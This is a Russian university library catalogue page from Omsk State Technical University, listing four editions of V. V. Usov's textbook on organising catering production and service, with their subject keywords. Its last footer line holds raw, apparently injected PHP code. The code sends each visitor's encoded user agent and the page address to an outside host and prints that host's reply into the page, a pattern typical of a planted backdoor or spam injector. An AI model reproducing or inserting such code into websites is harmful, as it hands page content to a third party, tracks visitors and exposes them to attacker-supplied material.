Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

122 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПОСУДА кухонная")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 4
1. 
Усов В. В. Организация производства и обслуживания на предприятиях общественного питания [Текст] / В. В. Усов, 2011. - 432 с.
Ключевые слова 
РЕСТОРАН -- ЦЕХ заготовочный -- ПОСУДА кухонная -- ХОЗЯЙСТВО складское -- ЦЕХ ДОРАБОТКИ ПОЛУФАБРИКАТОВ -- ЦЕХ специализированный -- ПОСУДА СТОЛОВАЯ -- БРАКЕРАЖ -- СТОЛОВАЯ -- БУФЕТ -- ИНТЕРЬЕР ресторана -- МОЕЧНАЯ столовой ПОСУДЫ -- БАР -- Сервизная -- Машина контрольно-кассовая -- Бельевая -- Гладильная -- ПРИБОР СТОЛОВЫЙ -- Белье столовое -- МЕТРДОТЕЛЬ -- ОФИЦИАНТ -- СЕРВИРОВКА -- МЕНЮ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- Вино -- Аперитив -- Сомелье -- КУЛЬТУРА обслуживания -- ЭТИКЕТ СТОЛОВЫЙ -- СТОЛ ШВЕДСКИЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - ЧАЙ -- Банкет - коктейль -- БАНКЕТ свадебный -- БАНКЕТ КОМБИНИРОВАННЫЙ -- БАНКЕТ С ЧАСТИЧНЫМ ОБСЛУЖИВАНИЕМ -- КЕЙТЕРИНГ
Держатели документа (Информация об экземплярах) 
2. 
Усов В. В. Организация производства и обслуживания на предприятиях общественного питания [Текст] : учеб. пособие для образоват. учреждений нач. проф. образования / В. В. Усов, 2007. - 415 с.
Ключевые слова 
РЕСТОРАН -- ЦЕХ заготовочный -- ПОСУДА кухонная -- ХОЗЯЙСТВО складское -- ЦЕХ ДОРАБОТКИ ПОЛУФАБРИКАТОВ -- ЦЕХ специализированный -- ПОСУДА СТОЛОВАЯ -- БРАКЕРАЖ -- СТОЛОВАЯ -- БУФЕТ -- ИНТЕРЬЕР ресторана -- МОЕЧНАЯ столовой ПОСУДЫ -- БАР -- Сервизная -- Машина контрольно-кассовая -- Бельевая -- Гладильная -- ПРИБОР СТОЛОВЫЙ -- Белье столовое -- МЕТРДОТЕЛЬ -- ОФИЦИАНТ -- СЕРВИРОВКА -- МЕНЮ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- Вино -- Аперитив -- Сомелье -- КУЛЬТУРА обслуживания -- ЭТИКЕТ СТОЛОВЫЙ -- СТОЛ ШВЕДСКИЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - ЧАЙ -- Банкет - коктейль -- БАНКЕТ свадебный -- ПРИЕМ -- ПИТАНИЕ интуристов -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЕКЛАМА - Ресторан -- УСЛУГИ ресторанные -- ОХРАНА ТРУДА -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ
Держатели документа (Информация об экземплярах) 
3. 
Усов В. В. Организация производства и обслуживания на предприятиях общественного питания [Текст] : учеб. для образоват. учреждений нач. проф. образования / В. В. Усов, 2006. - 415 с.
Ключевые слова 
РЕСТОРАН -- ЦЕХ заготовочный -- ПОСУДА кухонная -- ХОЗЯЙСТВО складское -- ЦЕХ ДОРАБОТКИ ПОЛУФАБРИКАТОВ -- ЦЕХ специализированный -- ПОСУДА СТОЛОВАЯ -- БРАКЕРАЖ -- СТОЛОВАЯ -- БУФЕТ -- ИНТЕРЬЕР ресторана -- МОЕЧНАЯ столовой ПОСУДЫ -- БАР -- Сервизная -- Машина контрольно-кассовая -- Бельевая -- Гладильная -- ПРИБОР СТОЛОВЫЙ -- Белье столовое -- МЕТРДОТЕЛЬ -- ОФИЦИАНТ -- СЕРВИРОВКА -- МЕНЮ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- Вино -- Аперитив -- Сомелье -- КУЛЬТУРА обслуживания -- ЭТИКЕТ СТОЛОВЫЙ -- СТОЛ ШВЕДСКИЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - ЧАЙ -- Банкет - коктейль -- БАНКЕТ свадебный -- ПРИЕМ -- ПИТАНИЕ интуристов -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЕКЛАМА - Ресторан -- УСЛУГИ ресторанные -- ОХРАНА ТРУДА -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ
Держатели документа (Информация об экземплярах) 
4. 
Усов В. В. Организация производства и обслуживания на предприятиях общественного питания [Текст] : Учеб. / В. В. Усов, 2002. - 415 с.
Ключевые слова 
РЕСТОРАН -- ЦЕХ заготовочный -- ПОСУДА кухонная -- ХОЗЯЙСТВО складское -- ЦЕХ ДОРАБОТКИ ПОЛУФАБРИКАТОВ -- ЦЕХ специализированный -- ПОСУДА СТОЛОВАЯ -- БРАКЕРАЖ -- СТОЛОВАЯ -- БУФЕТ -- ИНТЕРЬЕР ресторана -- МОЕЧНАЯ столовой ПОСУДЫ -- БАР -- Сервизная -- машина контрольно-кассовая -- Бельевая -- Гладильная -- ПРИБОР СТОЛОВЫЙ -- Белье столовое -- МЕТРДОТЕЛЬ -- ОФИЦИАНТ -- СЕРВИРОВКА -- МЕНЮ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- Вино -- Аперитив -- Сомелье -- КУЛЬТУРА обслуживания -- ЭТИКЕТ СТОЛОВЫЙ -- СТОЛ ШВЕДСКИЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - ЧАЙ -- Банкет - коктейль -- БАНКЕТ свадебный -- ПРИЕМ -- ПИТАНИЕ интуристов -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЕКЛАМА - Ресторан -- УСЛУГИ ресторанные -- ОХРАНА ТРУДА -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3053 - 19.10.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.84 с.12 запросов, 0.84c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;